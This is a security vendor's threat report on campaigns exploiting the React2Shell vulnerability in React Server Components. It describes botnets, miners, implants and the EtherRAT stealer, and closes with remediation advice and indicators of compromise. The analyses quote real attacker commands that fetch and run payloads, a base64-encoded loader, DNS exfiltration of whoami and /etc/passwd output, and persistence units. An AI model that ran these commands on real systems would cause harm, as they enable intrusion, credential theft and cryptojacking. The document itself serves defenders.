Adversaries exploit CVE‑2025‑55182 to attack Russian companies
In December 2025, BI.ZONE TDR detected malicious activity targeting companies in the Russian insurance, e‑commerce, and IT sectors. The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability. The campaign primarily distributed the XMRig cryptocurrency miner and, occasionally, the Kaiji and Rustobot botnets or the Sliver implant.
BI.ZONE Threat Intelligence also identified campaigns exploiting React2Shell that were not targeting Russia. In these attacks, threat actors deployed a wider range of malware, including the CrossC2 implant for Cobalt Strike, the Tactical RMM remote administration tool, the VShell loaders and backdoor, and the EtherRAT remote access trojan.
- Adversaries can weaponize critical vulnerabilities within hours, even though many such flaws never see real‑world exploitation.
- Often, just fixing a vulnerability is not enough. It is equally important to assess systems for indicators of both successful exploitation and post‑exploitation activity.
- Exploitation of such vulnerabilities is often widespread and can involve a wide range of malicious activities.
Attacks targeting Russian companies
Case 1
After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container:
/bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot || cd /tmp; curl -O hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot'
The ELF executable named bot is the RustoBot malware. That is, a botnet written in Rust, which primarily targets TOTOLINK devices.
The malware retrieves the C2 server address by resolving the following domain names:
ilefttotolinkalone.anondns[.]netrustbot.anondns[.]netbitcoinbandit.anondns[.]netcryptoenjoyers.anondns[.]netdontblockme.anondns[.]net
These domain names resolve to the IP address 45.137.201[.]137.
RustoBot is capable of conducting DDoS attacks via UDP flood, TCP flood, and Raw IP flood techniques. The attacks are configurable with parameters such as target IP/port, duration (in seconds), and packet size (in bytes).
Additionally, RustoBot embeds XMRig as a payload.
Subsequently, the attackers downloaded and executed a Bash script from a remote network resource.
The script contained the following Base64‑encoded commands:
/bin/sh -c 'echo Y3VybCAtcyAtLW1heC10aW1lIDUgaHR0cHM6Ly90ci5lYXJuLnRvcC9Mb2cucGhwP2lkPU1JSUtO | base64 -d | sh'
/bin/sh -c 'echo Y3VybCAtZnNTTCBodHRwczovL3RyLmVhcm4udG9wL2FwYWNoZXMuc2ggLW8gL3RtcC9hcGFjaGVzLnNoICYmIGNobW9kICt4IC90bXAvYXBhY2hlcy5zaCAmJiBub2h1cCAvdG1wL2FwYWNoZXMuc2ggPi9kZXYvbnVsbCAyPiYxICY= | base64 -d | sh'
Decoded commands:
curl -s --max-time 5 hxxps://tr.earn[.]top/Log.php?id=MIIKN
curl -fsSL hxxps://tr.earn[.]top/apaches.sh -o /tmp/apaches.sh && chmod +x /tmp/apaches.sh && nohup /tmp/apaches.sh >/dev/null 2>&1 &
The apaches.sh Bash script serves to download and install XMRig. The UPX‑packed ELF executable for the miner was downloaded from hxxps://tr.earn[.]top/nginxs, with its configuration file fetched from hxxps://tr.earn[.]top/config.json. If apaches.sh is executed with root privileges, the script saves the downloaded files to /usr/local/sbin. Otherwise, they are stored in /tmp. The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service and a Cron task.
Subsequently, the following commands were detected on the compromised host:
/bin/sh -c 'echo $((41*271))'
/bin/sh -c whoami
curl hxxp://103.135.101[.]15/wocaosinm.sh
/bin/sh -c '$(curl -s hxxp://keep.camdvr[.]org:8000/d5.sh | bash | gzip -n | base64 -w0)'
Following this, the attackers loaded the wocaosinm.sh Bash script onto the host to download an architecture‑specific ELF executable (linux_386 or linux_amd64), identified as the Kaiji botnet (Ares build).
The Kaiji malware has the following capabilities:
- Performs DDoS attacks via SYN flood, ACK flood, and UDP flood techniques with spoofing the Source IP from a predefined range, as well as enables WebSocket protocol attacks.
- Executes arbitrary shell commands on a compromised system.
- Performs dynamic configuration management through the encrypted
.walk.lodfile placed in various system directories (/dev,/etc,/mnt,/opt,/sys,/usr,/run,/var/run,/tmp), allowing remote modification of parameters such as IP range, IDs of processes to kill on startup, operational mode, and bot ID. - Establishes persistence via multiple mechanisms:
systemdservices,crontabtasks,init.dscripts,rc.localandprofile.dmodifications, and thedns-tcpservice creation. - Replaces system utilities (ls, ps, ss, netstat, find, lsof) in
/usr/bin/with modified versions that redirect execution to the original files, and masquerades as legitimate system libraries and configuration files (libgdi.so.0.8.1,opt.services.cfg,System.mod). - Deploys XMRig.
The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant from hxxp://keep.camdvr[.]org:8000/BREAKABLE_PARABLE5.
Depending on the privileges available, the script establishes persistence for the Sliver implant as follows:
- If executed with
rootprivileges, copies the downloaded payload to/usr/bin/sshd-agent, makes the file immutable usingchattr +I, and creates asystemdservice. - If executed without
rootprivileges, first attempts privilege escalation viasu - root. If the attempt fails, creates a hidden directory~/.config/.system-monitor/, copies the payload there as.sys-monand adds it to bothcrontab(@reboot), and.bashrc. For service accounts (e. g.www-data) the payload is placed in/tmp/.system-update/.
Finally, d5.sh erases the traces: removes temporary files, clears the bash history, truncates the .bash_history file to zero, and self-deletes.
The Sliver implant connected to the C2 server keep.camdvr[.]org.
This malware delivery activity involving Kaiji and Sliver has been previously described by Huntress.
Case 2
After compromising a host via the React2Shell vulnerability, the attackers executed the following commands inside a container:
wget -O /tmp/runnv.tar.gz hxxp://128.199.194[.]97:9001/runnv.tar.gz
wget -O - hxxp://128.199.194[.]97:9001/setup2.sh
/sbin/modprobe msr allow_writes=on
Execution of these commands resulted in deployment of XMRig version 6.24.0 to the victim’s system.
The loaded archive runnv.tar.gz contained the miner’s config.json file and the ELF executable for XMRig process named runnv.
The loaded Bash script setup2.sh was identified as a modified script setup_c3pool_miner.sh, which served to install the miner onto the system. The WALLET parameter specifies the cryptocurrency wallet address: 49Qp2aEzUdEANd88muJEvDVKEzn9xbm5xEXjZ8QUeN1ndVxvtUuSjZAecFJHabrzYE2VXTu5sZM8H5GiKfKah1VJBwuWhYc.
setup2.sh
During its execution, setup2.sh downloaded two additional Bash scripts: alive.sh and lived.sh.
The alive.sh script executes ps -eo pid,pcpu --no-headers and terminates any process consuming 40% CPU or more.
It does not terminate the following processes:
- launched from the
/tmp/runnv/* - named
/tmp/runnv/runnv - containing the
zzhstring in their command line
The lived.sh script terminates the following processes:
- containing
.sh/shin their name - containing
python*in their name - launched from
/tmpdirectory - identified as ELF executables
Case 3
After compromising a host via the React2Shell vulnerability, the attackers performed reconnaissance inside the onyxdotapp/onyx-web-server:latest container by executing the following Base64‑encoded commands:
/bin/sh -c 'echo bHM= | base64 -d | sh'
/bin/sh -c 'echo bnNsb29rdXAgYHdob2FtaWAub2lhMGx3dXQybjY1ZjhvNHN3bWJlc3UwbnJ0aWg5NXkub2FzdGlmeS5jb20= | base64 -d | sh'
/bin/sh -c 'echo bnNsb29rdXAgYGxzYC5vaWEwbHd1dDJuNjVmOG80c3dtYmVzdTBucnRpaDk1eS5vYXN0aWZ5LmNvbQ== | base64 -d | sh'
/bin/sh -c 'echo bnNsb29rdXAgYGxzYC42a3JpbmV3YjQ1OG5ocXFtdWVvdGdhd2lwOXYxanI3Zy5vYXN0aWZ5LmNvbQ== | base64 -d | sh'
/bin/sh -c 'echo bnNsb29rdXAgYGlkYC42a3JpbmV3YjQ1OG5ocXFtdWVvdGdhd2lwOXYxanI3Zy5vYXN0aWZ5LmNvbQ== | base64 -d | sh'
/bin/sh -c 'echo bnNsb29rdXAgYHdob2FtaWAuNmtyaW5ld2I0NThuaHFxbXVlb3RnYXdpcDl2MWpyN2cub2FzdGlmeS5jb20= | base64 -d | sh'
Decoded commands:
ls
nslookup `whoami`.oia0lwut2n65f8o4swmbesu0nrtih95y.oastify[.]com
nslookup `ls`.oia0lwut2n65f8o4swmbesu0nrtih95y.oastify[.]com
nslookup `id`.6krinewb458nhqqmueotgawip9v1jr7g.oastify[.]com
nslookup `cat /etc/passwd`.6krinewb458nhqqmueotgawip9v1jr7g.oastify[.]com
Notably, the adversaries used DNS tunneling to exfiltrate the command execution results.
Subsequently, they loaded and executed the sex.sh script:
/bin/sh -c 'wget hxxp://216.158.232[.]43:12000/sex.sh && bash sex.sh'
This script downloaded the XMRig cryptocurrency miner (version 6.24.0) from hxxps://github[.]com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz and installed it onto the system. The miner achieved persistence as system-update-service.service:
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=xmrig --url pool.hashvault[.]pro:443 --user 88tGYBwhWNzGesQs5QkwE1PdBa1tXGb9dcjxrdwujU3SEs3i7psaoJc4KmrDvv4VPTNtXazDWGkvGGfqurdBggvPEhZ43DJ --pass next --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Restart=always
RestartSec=10
User=root
[Install]
WantedBy=multi-user.target
Other cases
BI.ZONE Threat Intelligence investigated other attack campaigns that did not target Russian entities, but similarly leveraged the React2Shell vulnerability to distribute a wider array of malware.
CrossC2 Cobalt Strike
The attackers employed the check.sh Bash script to download ELF executables (a_x86/a_x64) from a server. Depending on privileges, the script saved the file as rsyslo either in /usr/local/rsyslo (when run as root) or in ${HOME}/.rsyslo (when run with standard privileges).
check.sh
After execution, check.sh creates and starts a service with the following description:
[Unit]
Description=Rsyslo AV Agent Service
After=network.target
[Service]
Type=simple
ExecStart=${BIN_PATH}
Restart=always
RestartSec=5
User=root
[Install]
WantedBy=multi-user.target
The a_x86/a_x64 ELF executables are the CrossC2 framework payloads for Cobalt Strike, designed for UNIX‑like systems. The files are packed with UPX, and their configuration is embedded at the end of the executable.
The configuration data is decrypted using the AES‑128‑CBC algorithm with the keyaaaabbbbccccdddd and the initialization vector abcdefghijklmnop.
The a_x86/a_x64 files use the same C2 server: 154.89.152[.]240:443.
Tactical RMM
While exploiting the React2Shell vulnerability, threat actors downloaded Tactical RMM (in the form of ELF executables) from hxxps://156.67.221[.]96/meshagents?id=hrfDDhB@yNf4oBrCH@R$KfVp27XfA78LiX@IZUxoTgs3zCwG$bjdpR@0oa8@BhTf&installflags=0&meshinstall=6.
During the installation, the Mesh agent’s configuration data was as follows:
MeshName=root
MeshType=2
MeshID=0x86B7C30E107EC8D7F8A01AC21FE47F29F569DBB5DF03BF0B897F88654C684E0B37CC2C06FDB8DDA51FB4A1AF3E0614DF
ServerID=1D707CFEC8870C83F9E4AFF93758BAE47E8BFB10BFD94FAC88EA6423A9CEE9BB1F7CB3C3B92E1E57DD9C471AABE6809C
MeshServer=wss://156.67.221[.]96:443/agent.ashx
VShell
The attackers downloaded the Bash script from hxxp://107.173.89[.]153:60051/slt. This script fetched ELF executables tailored for different system architectures:
l64="107.173.89[.]153:60051/?h=107.173.89[.]153&p=60051&t=tcp&a=l64&stage=true"
l32="107.173.89[.]153:60051/?h=107.173.89[.]153&p=60051&t=tcp&a=l32&stage=true"
a64="107.173.89[.]153:60051/?h=107.173.89[.]153&p=60051&t=tcp&a=a64&stage=true"
a32="107.173.89[.]153:60051/?h=107.173.89[.]153&p=60051&t=tcp&a=a32&stage=true"
The downloaded file was stored in /tmp/db946be9tcp.
These functionally identical executables serve as loaders for the VShell backdoor. The loader connects to the server 107.173.89[.]153:60051 via a TCP socket.
It sends the following data:
- architecture identifier string (
l32orl64, 6 bytes) - server port (
0xEA93) - server IP address (
107.173.89[.]153)
In response, the server sends an encrypted malicious payload. The loader decrypts this payload using a XOR operation with the key 0x99. The decrypted payload is then executed from an anonymous file descriptor created with memfd_create, as a [kworker/0:2] process.
This decrypted payload is the VShell backdoor, written in Go and obfuscated with the Garble tool. The VShell backdoor configuration is as follows:
{
"server": "107.173.89[.]153:60051",
"type": "tcp",
"vkey": "qwe123qwe111",
"proxy": "",
"salt": "qwe123qwe111",
"l": false,
"e": false,
"d": 30,
"h": 10
}
EtherRAT
Additionally, React2Shell attacks were recorded to distribute new EtherRAT malware, which was previously analyzed by Sysdig Threat Research Team.
The attackers retrieved a Bash script from hxxp://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. This script performed two main actions: it downloaded node-v20.10.0-linux-x64 to start a JS script, and it decoded two Base64‑encoded files:
$HOME/.local/share/.05bf0e9b/.kxnzl4mtez.js, it is the obfuscated JS script that decrypts.1d5j6rm2mg2d$HOME/.local/share/.05bf0e9b/.1d5j6rm2mg2d, it is the encrypted JS script
kxnzl4mtez.js decrypted the 1d5j6rm2mg2d file using AES‑256‑CBC with the Base64‑encoded key and initialization vector (IV):
key: cn7uRzKiMgOZ/dDxuclzgDrGKLQ7HEtEZ1Ld6k6eRsg=iv: 2iWxmWx4r98fhW9jIpzKXA==
The decrypted script was saved as 7vfgycfd01.js.
This script serves as the EtherRAT malware capable of executing arbitrary JS code received from the C2 server.
The malware establishes persistence through:
systemd:[Unit]
Description=User Application Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/node <jsPath>
Restart=always
RestartSec=30
Environment=DISPLAY=:0
[Install]
WantedBy=default.target- XDG Autostart:
[Desktop Entry]
Type=Application
Name=System Service
Exec=/usr/bin/node /<jsPath>
Hidden=true
NoDisplay=true
X-GNOME-Autostart-enabled=true
StartupNotify=false
Terminal=false crontab:@reboot sleep 30 && /usr/bin/node <jsPath> >/dev/null 2>&1 &.bashrc:(nohup /usr/bin/node <jsPath> >/dev/null 2>&1 &) 2>/dev/null.profile:(/usr/bin/node <jsPath> >/dev/null 2>&1 &) 2>/dev/null
Once persistence is established, the malware retrieves its C2 server address from an Ethereum smart contract accessible via an RPC endpoint 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4:
The retrieved C2 server address is hxxp://91.215.85[.]42:3000.
Subsequently, the malware sends a query to this C2 server to retrieve JS code fragments. The query uses the following format:
GET /api/{rand4hex}/{botID}/{rand4hex}.{png|jpg|gif|css|ico|webp}?{id|token|key|b|q|s|v}=c6d83cb1-a4de-443d-bd78-da925acc5f8d
Header: X-Bot-Server: {current_c2}
Timeout: 120 sec
The C2 server initially delivered five unique JS scripts. After this initial set, the server began cycling through the same set of scripts.
Script 1
This script performs detailed reconnaissance of system and configuration of hardware on hosts running UNIX‑like operating systems, Windows, and macOS. Its execution begins by identifying the operating system’s language settings. If the system language matches a predefined list of regions (ru, be, kk, ky, tg, uz, hy, az, ka), the script immediately terminates execution and deletes itself, aborting any further data collection.
If execution continues, the script gathers a set of basic system information, including the username and hostname, platform type and system architecture, system uptime, CPU model and core count, total and available RAM, MAC address of the network gateway, installed Node.js version.
The subsequent data collection phase is operating‑system dependent. On Windows, the script queries WMI for graphics card details, retrieves the OS version and edition from the registry, reads the Machine GUID, determines domain membership, checks for administrative privileges, and gathers antivirus information via the Windows Security Center.
On UNIX‑like systems and macOS, the script uses system utilities to identify the GPU model, extracts OS distribution and version data from standard configuration files or command‑line utilities, reads machine‑id, determines the host’s domain name, and checks if the process is running with root privileges. Furthermore, the script scans for running antivirus processes, including popular server‑based products.
Finally, to determine the host’s public IP address, the script sequentially queries the following public API services: api.ipify[.]org, api.my-ip[.]io, api64.ipify[.]org.
Script 2
This is a script that functions as a JS‑based stealer designed to collect and exfiltrate a wide array of sensitive user data, including cryptocurrency wallets, access tokens, cloud service configurations, and database credentials.
The script targets cryptocurrency wallet credentials: Ethereum private keys in hex format, BIP39 seed phrases (12 to 24 words), Bitcoin WIF keys, Keystore files, and other wallet file formats.
It also extracts tokens and API keys from various services, including version control systems, cloud providers (AWS, GCP, Azure), hosting platforms, payment and email services, messaging applications, as well as OpenAI and Anthropic API keys. Furthermore, it collects JWTs, bearer tokens, and webhook URLs.
Particular attention is given to SSH keys and infrastructure configuration. The script harvests private SSH keys, performs a complete scan of the ~/.ssh directory, and extracts AWS configuration files, gcloud-credentials, and Kubernetes and Docker configuration files. It also searches for database connection strings and passwords for PostgreSQL, MySQL, MongoDB, and Redis, including those exposed in environment variables.
Data collection is performed in both Windows and Linux environments. On Windows, the script analyzes user directories, data from popular cryptocurrency wallets, browser local storage (including data from extensions like MetaMask), PowerShell history, and directories containing web projects. On Linux, it scans home and system directories, cryptocurrency wallet configurations, browser extension data, and shell command history.
During file system traversal, the script actively seeks out credential‑containing files such as .env files, JSON configuration files, Wallet and Keystore files, SSH keys, package manager files, Docker and Terraform configuration files, and any file whose name contains keywords like secret, credential, password, token, key, wallet.
The script recursively traverses directories with a depth limit (maximum of 10 levels), reads files up to 10 MB in size, applies a set of regular expressions to identify credentials, and finally exfiltrates the harvested data to the remote server hxxp://91.215.85[.]42:3000/crypto/keys, retrying the transmission until it succeeds.
Script 3
The script generates random public IPv4 addresses and tries them against ports 80, 443, 3000, 3001, 8080, 8443. After identifying a host vulnerable to React2Shell, it exploits the vulnerability to download and execute a payload script from hxxp://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh.
Script 4
This script automatically modifies the configuration of nginx and Apache web servers in order to force all HTTP and HTTPS traffic to redirect to an external domain. The script also collects diagnostic and system information from the host and exfiltrates it to a remote webhook.
First, the script scans standard nginx configuration directories such as sites-enabled, conf.d and sites-available. It accesses the file system directly via Node.js. For each file it locates, the script performs a series of checks: excludes backup files with the .bak extension, and verifies that the item is a regular file. The file is then read entirely into memory. Processing continues only if the file contains the server string.
Using regular expressions, the script extracts key parameters from required configurations. It identifies the server name, paths to the SSL certificate and private key, and checks whether listening ports 80 and 443 are configured. Before making any modifications, the script creates a backup of the original configuration file by adding a .bak suffix.
It then generates a new server configuration file that completely replaces the original content. If the original configuration uses HTTP, the script creates a server block, for port 80, that performs a permanent redirect to an external HTTPS address.
server {
listen 80;
listen [::]:80;
server_name <name_from_original>;
return 301 hxxps://xss[.]pro$request_uri;
}
If the original configuration uses HTTPS, it creates a similar block for port 443 with SSL enabled. If no specific certificate paths are identified, the script uses standard snakeoil certificates from system directories. This new malicious configuration is written directly over the original file, completely replacing the previous logic for handling queries.
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name <name_from_original>;
ssl_certificate <path_from_original_or_/etc/ssl/certs/ssl-cert-snakeoil.pem>;
ssl_certificate_key <path_from_original_or_/etc/ssl/private/ssl-cert-snakeoil.key>;
return 301 hxxps://xss[.]pro$request_uri;
}
After overwriting the configurations, the script checks the nginx configuration for correct syntax by using the nginx -t command and analyzes the output for success. If the check passes, it attempts to reload the nginx configuration by using, in sequence, systemctl, service and the nginx -s reload signal. This approach ensures compatibility across different distributions and environments.
A similar process is executed for the Apache web server. The script scans standard Apache configuration directories, excludes backup and disabled configuration files, creates backups, and then disables active configurations by renaming them with a .disabled suffix. Subsequently, it creates a new configuration file in the same directory containing universal virtual hosts, for ports 80 and 443, that redirect all traffic to the same external resource. For HTTPS, the generated configuration likewise uses standard SSL certificates. The final step is to verify the Apache configuration and attempt to reload the web server.
In addition to modifying web server configurations, the script gathers detailed system information. The collected data includes the hostname, external IP address, username, PID, operating system type, results of the nginx and Apache configuration checks, a list of running web server processes, and the contents of key nginx directories. The script also records the exact timestamp of the operation.
All harvested information is exfiltrated via a POST request to a predefined webhook URL hxxps://webhook[.]site/63575795-ee27-4b29-a15d-e977e7dc8361 with the Content-Type: application/json header.
Script 5
The script adds its public key to authorized_keys.
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQDFTxaWmhQkYYF2LgNsAumFqxUiUSv8YEd7DRE9Wb076YxY0fGn4scWzmQnIP/xsrynapcrGKhBXW31BG7wFearY9fctJeHrnAw7CeXqMybFPGIrl+PbLsUnH2AeizjqTOhVZMrgO+0MdsNrdGTN58azTRIvDvgXX9/4p5tinRvisP8jQXPwRv9gurT9hbjrff8bFYmbttSkFXzwlvo5jVi3WrDBLeSSaEnolsJbvCGzzNtm2s77O3yesztMOn03YR1b1QWaOZMTQtzS7gvpKQ8voxypyUd2H+qwK1fe3S7t3QHnNBoKxHXi/KsxgFbY9G74SKV15jTFyrJCJOaYQbVSZiz+uPYDRgW4xBKDsKEx5ne2E4oqJVSSNiZ/QJs0+zA3QFIflcR3WrZ6xxw0ivk/nvhzcCsd+K94jK/qheJzrTTvWqjo8FauCN8LtxqQGpbNWHHRJqc2m/lTt8CA2V89RquqMX7FhArF86TnMxHHt9IDDCf07eIEbpLuWGpJLBJeHbqy5h8yB8ZoUj/E3E7+KMd6HGvYkKxn3YItfopArpg6AfWzP0bjyw7yzxdsbElkxL3K6UcBeTBXb/HMOpTE9uyNN4TvczJZAbB6Yy51x2RU4Yd815MFVPVFFn+5/z+ZyK9442c9/UHKMcbOtXkvydWM7v01xCc8tFlIFKa4w== root@vps
XMRig
The attackers retrieved a set of identical Bash scripts (2.sh, a1.sh, a2.sh, a3.sh) from hxxp://45.134.174[.]235:443/. Each script downloaded and executed a hardcoded ELF executable. The downloaded executables were named solra, solrc, solrk, solrz.
These executables perform the follwing actions:
- terminate all running processes except for
xmrig - deploy XMRig configured with the argument
www.chatgptaiweb[.]top:80
Adding SSH keys
The attackers used the love0 Bash script downloaded from hxxps://sitiolibre[.]com/wp/wp-content/plugins/gassembly/js/love0.
love0
This Bash script added an SSH key to authorized_keys to gain access to the system.
Reconnaissance
The attackers deployed a Bash script retrieved from hxxp://109.238.92[.]111/ch.sh.
This script, ch.sh, executed a series of reconnaissance commands to gather the following information from the target host:
- transferred argument
$1 datehostnameuname -aidenv | grep -iE ’HOST|URL|DOMAIN’arp -ancat /etc/resolv.confifconfig / ip addr
The collected data was then exfiltrated to hxxp://109.238.92[.]111:8000/upload.
Remediation and mitigation
CVE‑2025‑55182 was detected in several versions of packages for React Server Components. Affected packages:
react-server-dom-webpackreact-server-dom-parcelreact-server-dom-turbopack
Affected versions:
- 19.0
- 19.1.0
- 19.1.1
- 19.2.0
CVE‑2025‑55182 is a critical vulnerability that can severely affect application security. Consequently, all organizations and developers using the vulnerable packages are strongly urged to take immediate remediation steps.
Patches for this vulnerability have been released in versions 19.0.1, 19.1.2, and 19.2.1.
It is imperative to update all affected dependencies to these or higher versions. For detailed information regarding the vulnerability and the applied fixes, refer to the official React blog announcement.
Next.js projects utilizing React Server Components may also be affected by CVE‑2025‑55182. The following steps are recommended:
- Verify the current version of Next.js and its dependencies.
- Upgrade Next.js to a version that includes the patched
react-server-dom-*. - Ensure the project does not use the known vulnerable versions of the affected packages.
Additional security measures:
- Rebuild the project after updating the dependencies.
- Check the
package-lock.json,yarn.lockorpnpm-lock.yamlfiles to confirm that vulnerable package versions have been completely removed. - Restrict the use of experimental React Server Components features in production environments unless they are covered by up‑to‑date security patches.
- Continuously monitor React team publications on security and framework updates.
| Type | Indicator | Context |
|---|---|---|
| SHA256 |
|
Bash script deploying XMRig |
|
|
Bash script deploying Kaiji |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying Sliver |
|
|
|
Bash script deploying VShell |
|
|
|
Bash script deploying VShell |
|
|
|
Bash script deploying CrossC2 Cobalt Strike |
|
|
|
Bash script collecting data on target |
|
|
|
Bash script deploying EtherRAT |
|
|
|
Bash script adding SSH keys |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
Bash script deploying XMRig |
|
|
|
ELF32, Kaiji |
|
|
|
ELF64, Kaiji |
|
|
|
ELF64, UPX, RustoBot |
|
|
|
ELF64, Sliver |
|
|
|
ELF64, UPX, XMRig |
|
|
|
tar.gz archive containing XMRig miner and config |
|
|
|
ELF64, XMRig |
|
|
|
JSON, XMRig config |
|
|
|
ELF64, UPX, XMRig |
|
|
|
ELF64, UPX, XMRig |
|
|
|
ELF64, UPX, XMRig |
|
|
|
ELF64, UPX, XMRig |
|
|
|
Encrypted payload, EtherRAT |
|
|
|
ELF64, Tactical RMM |
|
|
|
ELF32, Tactical RMM |
|
|
|
ELF32, Tactical RMM |
|
|
|
ELF32, Tactical RMM |
|
|
|
ELF32, Tactical RMM |
|
|
|
ELF64, Tactical RMM |
|
|
|
ELF64, VShell |
|
|
|
ELF32, VShell |
|
|
|
ELF64, VShell |
|
|
|
ELF32, VShell |
|
|
|
ELF64, UPX, CrossC2 Cobalt Strike |
|
|
|
ELF32, UPX, CrossC2 Cobalt Strike |
|
| URL |
|
RustoBot delivery |
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
Kaiji delivery |
|
|
|
Sliver delivery |
|
|
|
Sliver delivery |
|
|
|
Tactical RMM delivery |
|
|
|
Tactical RMM C2 |
|
|
|
VShell delivery |
|
|
|
EtherRAT delivery |
|
|
|
EtherRAT C2 |
|
|
|
Exfiltration to EtherRAT C2 |
|
|
|
Exfiltration to EtherRAT C2 |
|
|
|
Exfiltration to C2 |
|
|
|
Reconnaissance script deployment |
|
|
|
SSH key backdoor deployment |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
CrossC2 Cobalt Strike delivery |
|
|
|
CrossC2 Cobalt Strike delivery |
|
| Domain |
|
XMRig delivery |
|
|
Sliver C2 |
|
|
|
DNS tunneling for command output |
|
|
|
DNS tunneling for command output |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
RustoBot C2 |
|
|
|
RustoBot C2 |
|
|
|
RustoBot C2 |
|
|
|
RustoBot C2 |
|
|
|
RustoBot C2 |
|
|
|
Kaiji C2 |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
URL for SSH backdoor script |
|
|
|
XMRig mining pool |
|
| IP address |
|
Kaiji delivery |
|
|
RustoBot delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig delivery |
|
|
|
XMRig mining pool |
|
|
|
RustoBot C2 |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
XMRig mining pool |
|
|
|
CrossC2 Cobalt Strike delivery |
|
|
|
Tactical RMM delivery |
|
|
|
VShell delivery |
|
|
|
EtherRAT C2 |
|
|
|
EtherRAT delivery |
|
|
|
Exfiltrating data on target |
|
|
|
XMRig delivery |
To promptly detect and neutralize cyber threats within your infrastructure, continuous security monitoring is essential. This is possible with dedicated services like BI.ZONE TDR. The service allows you to manage the entire incident lifecycle: before, during, and after an attack. By combining SOCaaS and MDR approaches, BI.ZONE TDR delivers comprehensive infrastructure coverage and enables you to build an effective defense strategy. You can block ongoing attacks, investigate past incidents, and get guidance on threat prevention.
Effective cybersecurity strategy requires an understanding of vulnerabilities exploited in real attacks. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. It provides information about the emerging cyber threats to help you stay proactive and accelerate your incident response.